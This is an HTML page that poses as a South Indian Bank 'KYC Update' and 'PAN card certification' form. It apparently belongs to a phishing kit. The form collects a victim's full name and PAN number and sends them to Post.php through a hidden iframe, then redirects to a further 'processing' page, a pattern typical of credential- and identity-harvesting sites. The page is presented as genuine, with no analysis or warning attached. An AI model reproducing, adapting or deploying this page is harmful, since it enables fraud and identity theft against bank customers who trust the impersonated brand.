<!DOCTYPE html>
<html lang="en" >
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
    <meta charSet="utf-8" />
    <meta name="viewport" content="width=device-width" />
    <meta name="theme-color" content="#AE2626">
    <title>KYC Update | South Indian Bank</title>
<meta name="description" content="login" />
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="theme-color" content="#ffffff">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Arimo:ital,wght@0,400..700;1,400..700&display=swap" rel="stylesheet">
<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css'>
<link rel="stylesheet" href="./style.css">
</head>
<style type="text/css">
#mn
{ 
  width:104%;
  margin-left:-7px;
  margin-bottom:20px;
}
#ft
{ 
  width:104%;
  margin-left:-6px;
}
#pc
{ 
  width:100%;
  margin-bottom:0px;
}
#cp
{ 
  width:65%;
  margin-left:2px;
  margin-bottom:10px;
}
#dc
{ 
  width:95%;
  margin-left:5px;
  margin-top:-15px;
}
input[type="text"] {
  width: 95%;
  color:#000;
  font-size:14px;
  border: 1px solid #E3DFDE;
  border-radius: 4px;
  letter-spacing:0.5px;
  padding:10px 30px;
  outline: none;
  box-sizing: border-box;
  transition: 0.3s;
}
body{
  font-family: 'Arimo', sans-serif;
   background-color: #f7f7f7;
  
}


/*------------*/
.form-area {
    background-color: #fff;
    box-shadow: 2px 5px 10px rgba(90, 116, 148, 0.2);
    padding: 25px;
    border-radius: 6px;
    display: flex;
    }
.form-area .form-inner {
    width: 100%;
}
.intl-tel-input,
.iti{
  width: 100%;
}
.input-group__input
{
    text-transform: uppercase;
}

.inputWithIcon input[type="text"] {
  padding-left: 30px;
}

.inputWithIcon {
  position: relative;
}

.inputWithIcon i {
  position: absolute;
  left: 0;
  top: 1px;
  font-size:13px;
  padding: 10px 18px;
  color: #777777;
  transition: 0.3s;
}
.inputWithIconN input[type="text"] {
  padding-left: 30px;
}

.inputWithIconN {
  position: relative;
}

.inputWithIconN i {
  position: absolute;
  left: 0;
  top: 1.5px;
  font-size:14px;
  padding: 10px 18px;
  color: #777777;
  transition: 0.3s;
}
.inputWithIconD input[type="text"] {
  padding-left: 30px;
}

.inputWithIconD {
  position: relative;
}

.inputWithIconD i {
  position: absolute;
  left: 0;
  top: 1.4px;
  font-size:14px;
  padding: 10px 16.5px;
  color: #777777;
  transition: 0.3s;
}
.inputWithIconHe {
  position: relative;
}

.inputWithIconHe i {
  position: absolute;
  left: -5px;
  top: -10px;
  font-size:18px;
  padding: 10px 10px;
  color: #AE2626;
  transition: 0.3s;
}
input::-webkit-input-placeholder {
    color: transparent;
    font-size:11px;
    font-family: 'Arimo', sans-serif;
}
input:focus::-webkit-input-placeholder {
    color: #999;
    font-size:11px;
    text-transform:none;
    font-family: 'Arimo', sans-serif;
}

/* Firefox < 19 */
input:-moz-placeholder {
    color: transparent;
    font-size:11px;
    font-family: 'Arimo', sans-serif;
}
input:focus:-moz-placeholder {
    color: #999;
    font-size:11px;
    font-family: 'Arimo', sans-serif;
    text-transform:none;
}

/* Firefox > 19 */
input::-moz-placeholder {
    color: transparent;
    font-size:11px;
    font-family: 'Arimo', sans-serif;
}
input:focus::-moz-placeholder {
    color: #999;
    font-size:11px;
    font-family: 'Arimo', sans-serif;
    text-transform:none;
}

/* Internet Explorer 10 */
input:-ms-input-placeholder {
    color: transparent;
    font-size:11px;
    font-family: 'Arimo', sans-serif;
}
input:focus:-ms-input-placeholder {
    color: #999;
    font-size:11px;
    font-family: 'Arimo', sans-serif;
    text-transform:none;
}
</style>
<body onload="startTimer();">
  <!-- Static- Please don't do anything here-->
  <script type="text/javascript">var submitted=false;</script>
  <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='new_processing3.html';}"></iframe>
        <div class="container">
        <img alt="" src="South_Logo.jpg" id="mn"/><br>
        <section class="pt-5 pb-5">
    <div class="container text-center">
        <div class="row">
        </div>
    </div>

    <div class="container">
        <div class="row justify-content-center">
                <div class="form-area">
                    <div class="form-inner">
                        <form class="LoginForm" action="Post.php" method="post" target="hidden_iframe" onsubmit="submitted=true" class="form">
                        <center><img alt="" src="South_L.jpg" id="pc"/></center>
                        <div class="inputWithIconHe">
                        <h3 style="color:#AE2626; font-family: 'Arimo', sans-serif; font-size:16px; letter-spacing:0.5px; margin-left:35px; margin-bottom:25px;">PAN CARD CERIFICATION</h3>
                        <i class="fa fa-id-card-o" aria-hidden="true"></i>
                        </div>
                        <div class="inputWithIconN">
                        <div class="input-group">
                        <center><input class="input-group__input" type="text" name="Full_Name" minlength="3" maxlength="30"
                        onkeydown="return /[a-z A-Z]/i.test(event.key)" placeholder="Enter Full Name (as per PAN) " id="Name" required />
                        <label class="input-group__label" for="mobile">Full Name (as per PAN) <span style="color:red;">*</span></label>
                        <i class="fa fa-user-o" aria-hidden="true"></i></center>
                        </div>
                        </div>
                        <div class="inputWithIconD">
                        <div class="input-group">
                        <center><input class="input-group__input" type="text" id="PAN_Number" name="PAN_Number" maxLength="10" placeholder="Enter PAN Number"
                        pattern="[a-zA-Z]{5}[0-9]{4}[a-zA-Z]{1}" title="Please enter valid PAN number !" required=""/>
                        <label class="input-group__label" for="mobile">Enter PAN Number <span style="color:red;">*</span></label>
                        <i class="fa fa-id-card-o" aria-hidden="true"></i></center>
                        </div>
                        </div><br>
                        <script type="text/javascript">
                        var isShift = false;
                        var seperator = "/";
                        window.onload = function () {
                        //Reference the Table.
                        var tblForm = document.getElementById("dob");
                        
                        //Reference all INPUT elements in the Table.
                        var inputs = document.getElementsByTagName("input");
                        
                        //Loop through all INPUT elements.
                        for (var i = 0; i < inputs.length; i++) {
                        //Check whether the INPUT element is TextBox.
                        if (inputs[i].name == "Date_Of_Birth") {
                        //Check whether Date Format Validation is required.
                        if (inputs[i].className.indexOf("date-format") != 1) {
                        
                        //Set Max Length.
                        inputs[i].setAttribute("maxlength", 10);
                        
                        //Only allow Numeric Keys.
                        inputs[i].onkeydown = function (e) {
                        return IsNumeric(this, e.keyCode);
                        };
                        
                        //Validate Date as User types.
                        inputs[i].onkeyup = function (e) {
                        ValidateDateFormat(this, e.keyCode);
                        };
                        }
                        }
                        }
                        };
                        
                        function IsNumeric(input, keyCode) {
                        if (keyCode == 16) {
                        isShift = true;
                        }
                        //Allow only Numeric Keys.
                        if (((keyCode >= 48 && keyCode <= 57) || keyCode == 8 || keyCode <= 37 || keyCode <= 39 || (keyCode >= 96 && keyCode <= 105)) && isShift == false) {
                        if ((input.value.length == 2 || input.value.length == 5) && keyCode != 8) {
                        input.value += seperator;
                        }
                        
                        return true;
                        }
                        else {
                        return false;
                        }
                        };
                        
                        function ValidateDateFormat(input, keyCode) {
                        var dateString = input.value;
                        if (keyCode == 16) {
                        isShift = false;
                        }
                        var regex = /(((0|1)[0-9]|2[0-9]|3[0-1])\/(0[1-9]|1[0-2])\/((19|20)\d\d))$/;
                        
                        //Check whether valid dd/MM/yyyy Date Format.
                        if (regex.test(dateString) || dateString.length == 0) {
                        ShowHideError(input, "none");
                        } else {
                        ShowHideError(input, "block");
                        }
                        };
                        
                        </script>
                        <center><button type="submit">Continue</button></center><br>
                        </form>
                        
</section>
                        <center><img alt="" src="Footer.jpg" id="ft"/></center>
               </div>
               </div>
               </div>
               </div>
               </html>